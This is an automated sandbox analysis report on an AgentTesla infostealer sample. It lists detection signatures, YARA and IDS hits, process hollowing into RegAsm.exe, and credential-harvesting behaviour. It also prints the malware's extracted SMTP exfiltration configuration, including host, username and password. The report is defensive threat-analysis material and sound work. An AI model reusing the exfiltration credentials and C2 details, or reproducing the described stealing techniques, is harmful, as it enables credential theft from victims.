Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VYLigyTDuW.exe

Overview

General Information

Sample name:VYLigyTDuW.exe
renamed because original name is a hash value
Original sample name:56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3.exe
Analysis ID:1587591
MD5:89471f2ae47d710f5b6db4afe8a48e77
SHA1:903d8a21673dcc19826fa56731dc2710f2d95755
SHA256:56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • VYLigyTDuW.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\VYLigyTDuW.exe" MD5: 89471F2AE47D710F5B6DB4AFE8A48E77)
    • RegAsm.exe (PID: 7360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 17 entries
              SourceRuleDescriptionAuthorStrings
              0.3.VYLigyTDuW.exe.6d1a10.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.3.VYLigyTDuW.exe.6d1a10.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.3.VYLigyTDuW.exe.6d1a10.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x316eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3175d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x317e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31879:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x318e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31955:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x319eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x31a7b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.3.VYLigyTDuW.exe.6d1a04.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.3.VYLigyTDuW.exe.6d1a04.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 25 entries

                      Networking

                      barindex
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7360, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-10T15:19:34.204660+010020301711A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-10T15:17:55.647888+010028555421A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-10T15:17:55.647888+010028552451A Network Trojan was detected192.168.2.449735162.254.34.31587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-10T15:19:34.204660+010028400321A Network Trojan was detected192.168.2.449735162.254.34.31587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: VYLigyTDuW.exeAvira: detected
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
                      Source: VYLigyTDuW.exeVirustotal: Detection: 84%Perma Link
                      Source: VYLigyTDuW.exeReversingLabs: Detection: 87%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: VYLigyTDuW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: VYLigyTDuW.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                      Source: VYLigyTDuW.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                      Source: VYLigyTDuW.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                      Source: VYLigyTDuW.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                      Source: VYLigyTDuW.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                      Source: VYLigyTDuW.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                      Source: VYLigyTDuW.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: VYLigyTDuW.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: VYLigyTDuW.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: VYLigyTDuW.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: VYLigyTDuW.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: VYLigyTDuW.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: VYLigyTDuW.exeString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2

                      System Summary

                      barindex
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_0054AA9F NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,0_2_0054AA9F
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A2DA5 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,0_2_022A2DA5
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeCode function: 0_2_022A2D84 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,0_2_022A2D84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0044444F NtProtectVirtualMemory,1_2_0044444F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0044148D NtClose,1_2_0044148D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004414AB NtDelayExecution,1_2_004414AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0044395C NtAllocateVirtualMemory,1_2_0044395C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00441608 NtCreateThreadEx,1_2_00441608
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0044436E NtAllocateVirtualMemory,1_2_0044436E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004443CE NtProtectVirtualMemory,1_2_004443CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0044189B NtDelayExecution,1_2_0044189B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00441E22 NtDelayExecution,1_2_00441E22
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010FC52C1_2_010FC52C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010FDBE01_2_010FDBE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010F4AA01_2_010F4AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010F3E881_2_010F3E88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010F41D01_2_010F41D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010FE4BD1_2_010FE4BD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_05975D501_2_05975D50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0597A1501_2_0597A150
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0597E0E81_2_0597E0E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_059792081_2_05979208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_059745C01_2_059745C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_059735601_2_05973560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_05973CC01_2_05973CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_059756701_2_05975670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_059703081_2_05970308
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0597C3701_2_0597C370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_067FA1981_2_067FA198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_067FBC481_2_067FBC48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_010FDF881_2_010FDF88
                      Source: VYLigyTDuW.exeStatic PE information: invalid certificate
                      Source: VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exe, 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameacvm7qw909e.exe vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exeBinary or memory string: OriginalFilenameacvm7qw909e.exe vs VYLigyTDuW.exe
                      Source: VYLigyTDuW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@3/1@1/2
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                      Source: VYLigyTDuW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: VYLigyTDuW.exeVirustotal: Detection: 84%
                      Source: VYLigyTDuW.exeReversingLabs: Detection: 87%
                      Source: unknownProcess created: C:\Users\user\Desktop\VYLigyTDuW.exe "C:\Users\user\Desktop\VYLigyTDuW.exe"
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: vb6de.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: vb6de.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VYLigyTDuW.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
